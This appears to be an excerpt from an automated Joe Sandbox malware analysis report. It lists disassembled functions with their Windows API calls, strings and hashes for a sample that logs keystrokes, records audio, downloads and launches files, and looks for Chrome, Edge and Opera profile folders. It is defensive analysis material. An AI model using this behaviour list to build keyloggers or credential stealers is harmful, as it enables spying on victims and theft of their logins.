                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LocalTime
                                                                    • String ID: KeepAlive | Enabled | Timeout:
                                                                    • API String ID: 481472006-1507639952
                                                                    • Opcode ID: 476cd4744044a21d670326b2e6a2e061cde7cb4bd516daf39f93a16a014a5405
                                                                    • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                                                    • Opcode Fuzzy Hash: 476cd4744044a21d670326b2e6a2e061cde7cb4bd516daf39f93a16a014a5405
                                                                    • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                                                    APIs
                                                                    • Sleep.KERNEL32 ref: 00416640
                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DownloadFileSleep
                                                                    • String ID: !D@
                                                                    • API String ID: 1931167962-604454484
                                                                    • Opcode ID: 937e6411a14528dca01853be55d871c0a86d662150acf2ef91808204fd612e42
                                                                    • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                                                    • Opcode Fuzzy Hash: 937e6411a14528dca01853be55d871c0a86d662150acf2ef91808204fd612e42
                                                                    • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID: : $Se.
                                                                    • API String ID: 4218353326-4089948878
                                                                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                    • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                    • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                    APIs
                                                                    • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LocalTime
                                                                    • String ID: | $%02i:%02i:%02i:%03i
                                                                    • API String ID: 481472006-2430845779
                                                                    • Opcode ID: 4d6ed76d2c0007f2ef8e18d25abc2b2ad824726885c52fffdea772383ef611f4
                                                                    • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                                                    • Opcode Fuzzy Hash: 4d6ed76d2c0007f2ef8e18d25abc2b2ad824726885c52fffdea772383ef611f4
                                                                    • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                                                    APIs
                                                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExistsFilePath
                                                                    • String ID: alarm.wav$hYG
                                                                    • API String ID: 1174141254-2782910960
                                                                    • Opcode ID: 39d19c2a43c2ed2e8f72bfc28ae33d52c55f066a7a5f814dffca7f357dd18429
                                                                    • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                                                    • Opcode Fuzzy Hash: 39d19c2a43c2ed2e8f72bfc28ae33d52c55f066a7a5f814dffca7f357dd18429
                                                                    • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                                                    APIs
                                                                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                    • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                                                    • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                    • String ID: Online Keylogger Stopped
                                                                    • API String ID: 1623830855-1496645233
                                                                    • Opcode ID: ac1805cac8996209bf1c2067112dafa41632565b5e28ea0fa725300477cbc7ab
                                                                    • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                                                    • Opcode Fuzzy Hash: ac1805cac8996209bf1c2067112dafa41632565b5e28ea0fa725300477cbc7ab
                                                                    • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                                                    APIs
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                                                                      • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                    • String ID: Unknown exception
                                                                    • API String ID: 3476068407-410509341
                                                                    • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                    • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                                                                    • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                                                                    • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                                                                    APIs
                                                                      • Part of subcall function 10005AF6: GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
                                                                      • Part of subcall function 10005AF6: _free.LIBCMT ref: 10005B2D
                                                                      • Part of subcall function 10005AF6: SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
                                                                      • Part of subcall function 10005AF6: _abort.LIBCMT ref: 10005B74
                                                                    • _abort.LIBCMT ref: 10006DB0
                                                                    • _free.LIBCMT ref: 10006DE4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast_abort_free
                                                                    • String ID: {x
                                                                    • API String ID: 289325740-1982123439
                                                                    • Opcode ID: 4134211a845f049e2d4acd9fd6b474a5821acff52e97e1c06e3fd46459b96409
                                                                    • Instruction ID: 7f3fd5b75712fc04265cec68ea5e7784da53d851e8b66a8ea6aaee171cc4b2ef
                                                                    • Opcode Fuzzy Hash: 4134211a845f049e2d4acd9fd6b474a5821acff52e97e1c06e3fd46459b96409
                                                                    • Instruction Fuzzy Hash: 8B018439E01A32DBE751DF688C4115DB3A2FF08BE1B25821AE85067249CB35BD528FC5
                                                                    APIs
                                                                    • waveInPrepareHeader.WINMM(0073D260,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                                                    • waveInAddBuffer.WINMM(0073D260,00000020,?,00000000,00401A15), ref: 0040185F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: wave$BufferHeaderPrepare
                                                                    • String ID: us
                                                                    • API String ID: 2315374483-1548235463
                                                                    • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                                    • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                                                    • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                                                    • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID: $G
                                                                    • API String ID: 269201875-4251033865
                                                                    • Opcode ID: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
                                                                    • Instruction ID: ffc8389238c956ab6c1ca4f2b01b58cd1871601a5e35f3520dab429f03a8b914
                                                                    • Opcode Fuzzy Hash: 061f1d377262398e84625751e00800f7b3b9231d747b7f71bcbf8f837b64f860
                                                                    • Instruction Fuzzy Hash: 7DE0E592A0182014F6717A3F6C0575B0545CBC2B7FF11833BF538861C1CFAC4A46519E
                                                                    APIs
                                                                    • IsValidLocale.KERNEL32(00000000,JD,00000000,00000001,?,?,00444AEA,?,?,004444CA,?,00000004), ref: 00448B32
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LocaleValid
                                                                    • String ID: IsValidLocaleName$JD
                                                                    • API String ID: 1901932003-2234456777
                                                                    • Opcode ID: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                                                    • Instruction ID: c43517d2c5aad0833927174c53c021eab8a1ac695cd7bc198788f3b2bcf9e263
                                                                    • Opcode Fuzzy Hash: 98bf4732c76f9d0cbfb8c103c3b900cf5be1bffc9926f7dc5154a94851103fac
                                                                    • Instruction Fuzzy Hash: D6F05230A80308F7DB106B60DC06FAEBF58CB04B52F10017EFD046B291CE786E05929E
                                                                    APIs
                                                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExistsFilePath
                                                                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                    • API String ID: 1174141254-4188645398
                                                                    • Opcode ID: 965dca1d4fa88cfac5f6f8fbb5d51cfcba386e9eafac4d1f0b9ecc4064da3fd0
                                                                    • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                                                    • Opcode Fuzzy Hash: 965dca1d4fa88cfac5f6f8fbb5d51cfcba386e9eafac4d1f0b9ecc4064da3fd0
                                                                    • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                                                    APIs
                                                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExistsFilePath
                                                                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                    • API String ID: 1174141254-2800177040
                                                                    • Opcode ID: 360493449ea07e2e98fac80cd7dd5622e940bb2ad2e5d083d783952c5cb8964a
                                                                    • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                                                    • Opcode Fuzzy Hash: 360493449ea07e2e98fac80cd7dd5622e940bb2ad2e5d083d783952c5cb8964a
                                                                    • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                                                    APIs
                                                                    • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExistsFilePath
                                                                    • String ID: AppData$\Opera Software\Opera Stable\
                                                                    • API String ID: 1174141254-1629609700
                                                                    • Opcode ID: fe37175929c14716da7952d184f10776055712db205baa801b63751b31572000
                                                                    • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                                                    • Opcode Fuzzy Hash: fe37175929c14716da7952d184f10776055712db205baa801b63751b31572000
                                                                    • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID: $G
                                                                    • API String ID: 269201875-4251033865
                                                                    • Opcode ID: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                                                    • Instruction ID: d76a88c3c7e0b504eff74fb84b9f6db8507cba8af1ea4ea387731c34734dfbbf
                                                                    • Opcode Fuzzy Hash: 0ad43b1214ad8572508d9786c92e0b088e9d3dbafa2474dd36ac496255489d68
                                                                    • Instruction Fuzzy Hash: AAE0E562A0182040F675BA3F2D05B9B49C5DB8173BF11433BF538861C1DFAC4A4251AE
                                                                    APIs
                                                                    • GetKeyState.USER32(00000011), ref: 0040B64B
                                                                      • Part of subcall function 0040A3E0: GetForegroundWindow.USER32(?,?,004750F0), ref: 0040A416
                                                                      • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                                      • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                                                      • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                                                      • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?,?,004750F0), ref: 0040A43E
                                                                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(00475144,00000000,?,?,00000010,00000000,00000000), ref: 0040A461
                                                                      • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                                                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                    • String ID: [AltL]$[AltR]
                                                                    • API String ID: 2738857842-2658077756
                                                                    • Opcode ID: dd2f914049f4f370ef2f5aa51de3004961a69ba16bdb171d6c04a041743c3e8a
                                                                    • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                                                    • Opcode Fuzzy Hash: dd2f914049f4f370ef2f5aa51de3004961a69ba16bdb171d6c04a041743c3e8a
                                                                    • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                                                    APIs
                                                                    • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                                    • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: uD
                                                                    • API String ID: 0-2547262877
                                                                    • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                                    • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                                                    • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                                    • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                                                    APIs
                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
